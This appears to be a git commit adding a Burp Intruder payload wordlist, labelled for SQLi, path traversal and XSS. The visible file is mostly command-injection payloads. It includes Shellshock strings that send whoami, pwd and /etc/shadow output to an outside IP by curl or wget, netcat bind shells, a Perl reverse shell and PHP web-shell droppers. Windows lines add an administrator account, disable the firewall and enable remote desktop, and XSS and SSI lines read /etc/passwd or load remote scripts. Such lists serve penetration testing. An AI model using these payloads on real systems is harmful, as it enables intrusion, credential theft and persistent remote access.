More Burp Intruder file - SQLi + Path traversal + XSS
parent
694b980817
commit
dad26ce5e5
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,448 @@
|
||||||
|
`
|
||||||
|
||
|
||||||
|
|
|
||||||
|
;
|
||||||
|
'
|
||||||
|
'"
|
||||||
|
"
|
||||||
|
"'
|
||||||
|
&
|
||||||
|
&&
|
||||||
|
%0a
|
||||||
|
%0a%0d
|
||||||
|
%0Acat%20/etc/passwd
|
||||||
|
%0Aid
|
||||||
|
%0a id %0a
|
||||||
|
%0Aid%0A
|
||||||
|
%0a ping -i 30 127.0.0.1 %0a
|
||||||
|
%0A/usr/bin/id
|
||||||
|
%0A/usr/bin/id%0A
|
||||||
|
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|
||||||
|
%20{${phpinfo()}}
|
||||||
|
%20{${sleep(20)}}
|
||||||
|
%20{${sleep(3)}}
|
||||||
|
a|id|
|
||||||
|
a;id|
|
||||||
|
a;id;
|
||||||
|
a;id\n
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
|
||||||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
|
||||||
|
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
|
||||||
|
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
|
||||||
|
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
|
||||||
|
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
|
||||||
|
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
|
||||||
|
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
|
||||||
|
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
|
||||||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
|
||||||
|
cat /etc/hosts
|
||||||
|
$(`cat /etc/passwd`)
|
||||||
|
cat /etc/passwd
|
||||||
|
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
|
||||||
|
| curl http://crowdshield.com/.testing/rce.txt
|
||||||
|
& curl http://crowdshield.com/.testing/rce.txt
|
||||||
|
; curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
&& curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||||||
|
dir
|
||||||
|
| dir
|
||||||
|
; dir
|
||||||
|
$(`dir`)
|
||||||
|
& dir
|
||||||
|
&&dir
|
||||||
|
&& dir
|
||||||
|
| dir C:\
|
||||||
|
; dir C:\
|
||||||
|
& dir C:\
|
||||||
|
&& dir C:\
|
||||||
|
dir C:\
|
||||||
|
| dir C:\Documents and Settings\*
|
||||||
|
; dir C:\Documents and Settings\*
|
||||||
|
& dir C:\Documents and Settings\*
|
||||||
|
&& dir C:\Documents and Settings\*
|
||||||
|
dir C:\Documents and Settings\*
|
||||||
|
| dir C:\Users
|
||||||
|
; dir C:\Users
|
||||||
|
& dir C:\Users
|
||||||
|
&& dir C:\Users
|
||||||
|
dir C:\Users
|
||||||
|
;echo%20'<script>alert(1)</script>'
|
||||||
|
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
|
||||||
|
| echo "<?php include($_GET['page'])| ?>" > rfi.php
|
||||||
|
; echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||||
|
& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||||
|
&& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||||
|
echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||||
|
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
|
||||||
|
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||||
|
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||||
|
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||||
|
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||||
|
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
|
||||||
|
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||||
|
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||||
|
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||||
|
echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||||
|
;echo '<script>alert(1)</script>'
|
||||||
|
echo '<script>alert(1)</script>'// XXXXXXXXXXX
|
||||||
|
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
|
||||||
|
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||||||
|
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||||||
|
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||||
|
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||||
|
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||||
|
() { :;}; echo vulnerable 10
|
||||||
|
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||||
|
eval('ls')
|
||||||
|
eval('pwd')
|
||||||
|
eval('pwd');
|
||||||
|
eval('sleep 5')
|
||||||
|
eval('sleep 5');
|
||||||
|
eval('whoami')
|
||||||
|
eval('whoami');
|
||||||
|
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||||
|
exec('ls')
|
||||||
|
exec('pwd')
|
||||||
|
exec('pwd');
|
||||||
|
exec('sleep 5')
|
||||||
|
exec('sleep 5');
|
||||||
|
exec('whoami')
|
||||||
|
exec('whoami');
|
||||||
|
;{$_GET["cmd"]}
|
||||||
|
`id`
|
||||||
|
|id
|
||||||
|
| id
|
||||||
|
;id
|
||||||
|
;id|
|
||||||
|
;id;
|
||||||
|
& id
|
||||||
|
&&id
|
||||||
|
;id\n
|
||||||
|
ifconfig
|
||||||
|
| ifconfig
|
||||||
|
; ifconfig
|
||||||
|
& ifconfig
|
||||||
|
&& ifconfig
|
||||||
|
/index.html|id|
|
||||||
|
ipconfig
|
||||||
|
| ipconfig /all
|
||||||
|
; ipconfig /all
|
||||||
|
& ipconfig /all
|
||||||
|
&& ipconfig /all
|
||||||
|
ipconfig /all
|
||||||
|
ls
|
||||||
|
$(`ls`)
|
||||||
|
| ls -l /
|
||||||
|
; ls -l /
|
||||||
|
& ls -l /
|
||||||
|
&& ls -l /
|
||||||
|
ls -l /
|
||||||
|
| ls -laR /etc
|
||||||
|
; ls -laR /etc
|
||||||
|
& ls -laR /etc
|
||||||
|
&& ls -laR /etc
|
||||||
|
| ls -laR /var/www
|
||||||
|
; ls -laR /var/www
|
||||||
|
& ls -laR /var/www
|
||||||
|
&& ls -laR /var/www
|
||||||
|
| ls -l /etc/
|
||||||
|
; ls -l /etc/
|
||||||
|
& ls -l /etc/
|
||||||
|
&& ls -l /etc/
|
||||||
|
ls -l /etc/
|
||||||
|
ls -lh /etc/
|
||||||
|
| ls -l /home/*
|
||||||
|
; ls -l /home/*
|
||||||
|
& ls -l /home/*
|
||||||
|
&& ls -l /home/*
|
||||||
|
ls -l /home/*
|
||||||
|
*; ls -lhtR /var/www/
|
||||||
|
| ls -l /tmp
|
||||||
|
; ls -l /tmp
|
||||||
|
& ls -l /tmp
|
||||||
|
&& ls -l /tmp
|
||||||
|
ls -l /tmp
|
||||||
|
| ls -l /var/www/*
|
||||||
|
; ls -l /var/www/*
|
||||||
|
& ls -l /var/www/*
|
||||||
|
&& ls -l /var/www/*
|
||||||
|
ls -l /var/www/*
|
||||||
|
<!--#exec cmd="/bin/cat /etc/passwd"-->
|
||||||
|
<!--#exec cmd="/bin/cat /etc/shadow"-->
|
||||||
|
<!--#exec cmd="/usr/bin/id;-->
|
||||||
|
\n
|
||||||
|
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
|
||||||
|
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
|
||||||
|
\n/bin/ls -al\n
|
||||||
|
| nc -lvvp 4444 -e /bin/sh|
|
||||||
|
; nc -lvvp 4444 -e /bin/sh;
|
||||||
|
& nc -lvvp 4444 -e /bin/sh&
|
||||||
|
&& nc -lvvp 4444 -e /bin/sh &
|
||||||
|
nc -lvvp 4444 -e /bin/sh
|
||||||
|
nc -lvvp 4445 -e /bin/sh &
|
||||||
|
nc -lvvp 4446 -e /bin/sh|
|
||||||
|
nc -lvvp 4447 -e /bin/sh;
|
||||||
|
nc -lvvp 4448 -e /bin/sh&
|
||||||
|
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
|
||||||
|
\necho INJECTX\nexit\n\033[2Asleep 5\n
|
||||||
|
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
|
||||||
|
| net localgroup Administrators hacker /ADD
|
||||||
|
; net localgroup Administrators hacker /ADD
|
||||||
|
& net localgroup Administrators hacker /ADD
|
||||||
|
&& net localgroup Administrators hacker /ADD
|
||||||
|
net localgroup Administrators hacker /ADD
|
||||||
|
| netsh firewall set opmode disable
|
||||||
|
; netsh firewall set opmode disable
|
||||||
|
& netsh firewall set opmode disable
|
||||||
|
&& netsh firewall set opmode disable
|
||||||
|
netsh firewall set opmode disable
|
||||||
|
netstat
|
||||||
|
;netstat -a;
|
||||||
|
| netstat -an
|
||||||
|
; netstat -an
|
||||||
|
& netstat -an
|
||||||
|
&& netstat -an
|
||||||
|
netstat -an
|
||||||
|
| net user hacker Password1 /ADD
|
||||||
|
; net user hacker Password1 /ADD
|
||||||
|
& net user hacker Password1 /ADD
|
||||||
|
&& net user hacker Password1 /ADD
|
||||||
|
net user hacker Password1 /ADD
|
||||||
|
| net view
|
||||||
|
; net view
|
||||||
|
& net view
|
||||||
|
&& net view
|
||||||
|
net view
|
||||||
|
\nid|
|
||||||
|
\nid;
|
||||||
|
\nid\n
|
||||||
|
\n/usr/bin/id\n
|
||||||
|
perl -e 'print "X"x1024'
|
||||||
|
|| perl -e 'print "X"x16096'
|
||||||
|
| perl -e 'print "X"x16096'
|
||||||
|
; perl -e 'print "X"x16096'
|
||||||
|
& perl -e 'print "X"x16096'
|
||||||
|
&& perl -e 'print "X"x16096'
|
||||||
|
perl -e 'print "X"x16384'
|
||||||
|
; perl -e 'print "X"x2048'
|
||||||
|
& perl -e 'print "X"x2048'
|
||||||
|
&& perl -e 'print "X"x2048'
|
||||||
|
perl -e 'print "X"x2048'
|
||||||
|
|| perl -e 'print "X"x4096'
|
||||||
|
| perl -e 'print "X"x4096'
|
||||||
|
; perl -e 'print "X"x4096'
|
||||||
|
& perl -e 'print "X"x4096'
|
||||||
|
&& perl -e 'print "X"x4096'
|
||||||
|
perl -e 'print "X"x4096'
|
||||||
|
|| perl -e 'print "X"x8096'
|
||||||
|
| perl -e 'print "X"x8096'
|
||||||
|
; perl -e 'print "X"x8096'
|
||||||
|
&& perl -e 'print "X"x8096'
|
||||||
|
perl -e 'print "X"x8192'
|
||||||
|
perl -e 'print "X"x81920'
|
||||||
|
|| phpinfo()
|
||||||
|
| phpinfo()
|
||||||
|
{${phpinfo()}}
|
||||||
|
;phpinfo()
|
||||||
|
;phpinfo();//
|
||||||
|
';phpinfo();//
|
||||||
|
{${phpinfo()}}
|
||||||
|
& phpinfo()
|
||||||
|
&& phpinfo()
|
||||||
|
phpinfo()
|
||||||
|
phpinfo();
|
||||||
|
<?php system("cat /etc/passwd");?>
|
||||||
|
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||||||
|
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
|
||||||
|
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
|
||||||
|
<?php system("sleep 10");?>
|
||||||
|
<?php system("sleep 5");?>
|
||||||
|
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||||||
|
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
|
||||||
|
:phpversion();
|
||||||
|
`ping 127.0.0.1`
|
||||||
|
& ping -i 30 127.0.0.1 &
|
||||||
|
& ping -n 30 127.0.0.1 &
|
||||||
|
;${@print(md5(RCEVulnerable))};
|
||||||
|
${@print("RCEVulnerable")}
|
||||||
|
${@print(system($_SERVER['HTTP_USER_AGENT']))}
|
||||||
|
pwd
|
||||||
|
| pwd
|
||||||
|
; pwd
|
||||||
|
& pwd
|
||||||
|
&& pwd
|
||||||
|
\r
|
||||||
|
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||||
|
\r\n
|
||||||
|
route
|
||||||
|
| sleep 1
|
||||||
|
; sleep 1
|
||||||
|
& sleep 1
|
||||||
|
&& sleep 1
|
||||||
|
sleep 1
|
||||||
|
|| sleep 10
|
||||||
|
| sleep 10
|
||||||
|
; sleep 10
|
||||||
|
{${sleep(10)}}
|
||||||
|
& sleep 10
|
||||||
|
&& sleep 10
|
||||||
|
sleep 10
|
||||||
|
|| sleep 15
|
||||||
|
| sleep 15
|
||||||
|
; sleep 15
|
||||||
|
& sleep 15
|
||||||
|
&& sleep 15
|
||||||
|
{${sleep(20)}}
|
||||||
|
{${sleep(20)}}
|
||||||
|
{${sleep(3)}}
|
||||||
|
{${sleep(3)}}
|
||||||
|
| sleep 5
|
||||||
|
; sleep 5
|
||||||
|
& sleep 5
|
||||||
|
&& sleep 5
|
||||||
|
sleep 5
|
||||||
|
{${sleep(hexdec(dechex(20)))}}
|
||||||
|
{${sleep(hexdec(dechex(20)))}}
|
||||||
|
sysinfo
|
||||||
|
| sysinfo
|
||||||
|
; sysinfo
|
||||||
|
& sysinfo
|
||||||
|
&& sysinfo
|
||||||
|
;system('cat%20/etc/passwd')
|
||||||
|
system('cat C:\boot.ini');
|
||||||
|
system('cat config.php');
|
||||||
|
system('cat /etc/passwd');
|
||||||
|
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||||
|
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||||
|
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||||
|
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||||
|
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||||
|
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
|
||||||
|
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
|
||||||
|
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
|
||||||
|
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX